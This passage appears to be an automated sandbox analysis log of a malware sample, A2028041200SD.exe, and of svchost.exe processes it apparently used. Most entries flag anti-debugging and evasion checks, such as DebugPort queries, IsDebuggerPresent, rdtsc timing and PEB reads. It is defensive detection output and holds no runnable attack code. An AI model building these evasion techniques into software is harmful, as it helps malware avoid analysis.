                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7096E rdtsc 8_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C7543 LdrLoadDll,8_2_024C7543
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00946AAF BlockInput,0_2_00946AAF
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008F3D19
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00923920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00923920
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090E01E LoadLibraryA,GetProcAddress,0_2_0090E01E
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_012764E8 mov eax, dword ptr fs:[00000030h]0_2_012764E8
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_01277B18 mov eax, dword ptr fs:[00000030h]0_2_01277B18
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_01277B78 mov eax, dword ptr fs:[00000030h]0_2_01277B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F402E1 mov eax, dword ptr fs:[00000030h]8_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F402E1 mov eax, dword ptr fs:[00000030h]8_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F402E1 mov eax, dword ptr fs:[00000030h]8_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]8_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]8_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]8_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]8_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]8_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F402A0 mov eax, dword ptr fs:[00000030h]8_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F402A0 mov eax, dword ptr fs:[00000030h]8_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC62A0 mov eax, dword ptr fs:[00000030h]8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC62A0 mov eax, dword ptr fs:[00000030h]8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC62A0 mov eax, dword ptr fs:[00000030h]8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC62A0 mov eax, dword ptr fs:[00000030h]8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC62A0 mov eax, dword ptr fs:[00000030h]8_2_02FC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E284 mov eax, dword ptr fs:[00000030h]8_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E284 mov eax, dword ptr fs:[00000030h]8_2_02F6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB0283 mov eax, dword ptr fs:[00000030h]8_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB0283 mov eax, dword ptr fs:[00000030h]8_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB0283 mov eax, dword ptr fs:[00000030h]8_2_02FB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0274 mov eax, dword ptr fs:[00000030h]8_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34260 mov eax, dword ptr fs:[00000030h]8_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34260 mov eax, dword ptr fs:[00000030h]8_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34260 mov eax, dword ptr fs:[00000030h]8_2_02F34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2826B mov eax, dword ptr fs:[00000030h]8_2_02F2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A250 mov eax, dword ptr fs:[00000030h]8_2_02F2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36259 mov eax, dword ptr fs:[00000030h]8_2_02F36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEA250 mov eax, dword ptr fs:[00000030h]8_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEA250 mov eax, dword ptr fs:[00000030h]8_2_02FEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB8243 mov eax, dword ptr fs:[00000030h]8_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB8243 mov ecx, dword ptr fs:[00000030h]8_2_02FB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2823B mov eax, dword ptr fs:[00000030h]8_2_02F2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]8_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]8_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]8_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F663FF mov eax, dword ptr fs:[00000030h]8_2_02F663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F403E9 mov eax, dword ptr fs:[00000030h]8_2_02F403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov eax, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov eax, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE3DB mov eax, dword ptr fs:[00000030h]8_2_02FDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD43D4 mov eax, dword ptr fs:[00000030h]8_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD43D4 mov eax, dword ptr fs:[00000030h]8_2_02FD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEC3CD mov eax, dword ptr fs:[00000030h]8_2_02FEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]8_2_02F3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F383C0 mov eax, dword ptr fs:[00000030h]8_2_02F383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28397 mov eax, dword ptr fs:[00000030h]8_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28397 mov eax, dword ptr fs:[00000030h]8_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F28397 mov eax, dword ptr fs:[00000030h]8_2_02F28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E388 mov eax, dword ptr fs:[00000030h]8_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E388 mov eax, dword ptr fs:[00000030h]8_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E388 mov eax, dword ptr fs:[00000030h]8_2_02F2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5438F mov eax, dword ptr fs:[00000030h]8_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5438F mov eax, dword ptr fs:[00000030h]8_2_02F5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD437C mov eax, dword ptr fs:[00000030h]8_2_02FD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov ecx, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB035C mov eax, dword ptr fs:[00000030h]8_2_02FB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFA352 mov eax, dword ptr fs:[00000030h]8_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD8350 mov ecx, dword ptr fs:[00000030h]8_2_02FD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB2349 mov eax, dword ptr fs:[00000030h]8_2_02FB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C310 mov ecx, dword ptr fs:[00000030h]8_2_02F2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F50310 mov ecx, dword ptr fs:[00000030h]8_2_02F50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A30B mov eax, dword ptr fs:[00000030h]8_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A30B mov eax, dword ptr fs:[00000030h]8_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A30B mov eax, dword ptr fs:[00000030h]8_2_02F6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]8_2_02F2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F720F0 mov ecx, dword ptr fs:[00000030h]8_2_02F720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]8_2_02F2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F380E9 mov eax, dword ptr fs:[00000030h]8_2_02F380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB60E0 mov eax, dword ptr fs:[00000030h]8_2_02FB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB20DE mov eax, dword ptr fs:[00000030h]8_2_02FB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF60B8 mov eax, dword ptr fs:[00000030h]8_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]8_2_02FF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC80A8 mov eax, dword ptr fs:[00000030h]8_2_02FC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3208A mov eax, dword ptr fs:[00000030h]8_2_02F3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5C073 mov eax, dword ptr fs:[00000030h]8_2_02F5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F32050 mov eax, dword ptr fs:[00000030h]8_2_02F32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6050 mov eax, dword ptr fs:[00000030h]8_2_02FB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6030 mov eax, dword ptr fs:[00000030h]8_2_02FC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A020 mov eax, dword ptr fs:[00000030h]8_2_02F2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C020 mov eax, dword ptr fs:[00000030h]8_2_02F2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E016 mov eax, dword ptr fs:[00000030h]8_2_02F4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_030061E5 mov eax, dword ptr fs:[00000030h]8_2_030061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB4000 mov ecx, dword ptr fs:[00000030h]8_2_02FB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD2000 mov eax, dword ptr fs:[00000030h]8_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F601F8 mov eax, dword ptr fs:[00000030h]8_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]8_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF61C3 mov eax, dword ptr fs:[00000030h]8_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF61C3 mov eax, dword ptr fs:[00000030h]8_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB019F mov eax, dword ptr fs:[00000030h]8_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A197 mov eax, dword ptr fs:[00000030h]8_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A197 mov eax, dword ptr fs:[00000030h]8_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2A197 mov eax, dword ptr fs:[00000030h]8_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F70185 mov eax, dword ptr fs:[00000030h]8_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEC188 mov eax, dword ptr fs:[00000030h]8_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEC188 mov eax, dword ptr fs:[00000030h]8_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD4180 mov eax, dword ptr fs:[00000030h]8_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD4180 mov eax, dword ptr fs:[00000030h]8_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C156 mov eax, dword ptr fs:[00000030h]8_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC8158 mov eax, dword ptr fs:[00000030h]8_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36154 mov eax, dword ptr fs:[00000030h]8_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36154 mov eax, dword ptr fs:[00000030h]8_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov ecx, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC4144 mov eax, dword ptr fs:[00000030h]8_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F60124 mov eax, dword ptr fs:[00000030h]8_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov ecx, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov eax, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov eax, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA118 mov eax, dword ptr fs:[00000030h]8_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF0115 mov eax, dword ptr fs:[00000030h]8_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov eax, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDE10E mov ecx, dword ptr fs:[00000030h]8_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]8_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB06F1 mov eax, dword ptr fs:[00000030h]8_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB06F1 mov eax, dword ptr fs:[00000030h]8_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]8_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]8_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F666B0 mov eax, dword ptr fs:[00000030h]8_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]8_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34690 mov eax, dword ptr fs:[00000030h]8_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F34690 mov eax, dword ptr fs:[00000030h]8_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F62674 mov eax, dword ptr fs:[00000030h]8_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF866E mov eax, dword ptr fs:[00000030h]8_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF866E mov eax, dword ptr fs:[00000030h]8_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A660 mov eax, dword ptr fs:[00000030h]8_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A660 mov eax, dword ptr fs:[00000030h]8_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4C640 mov eax, dword ptr fs:[00000030h]8_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E627 mov eax, dword ptr fs:[00000030h]8_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F66620 mov eax, dword ptr fs:[00000030h]8_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68620 mov eax, dword ptr fs:[00000030h]8_2_02F68620
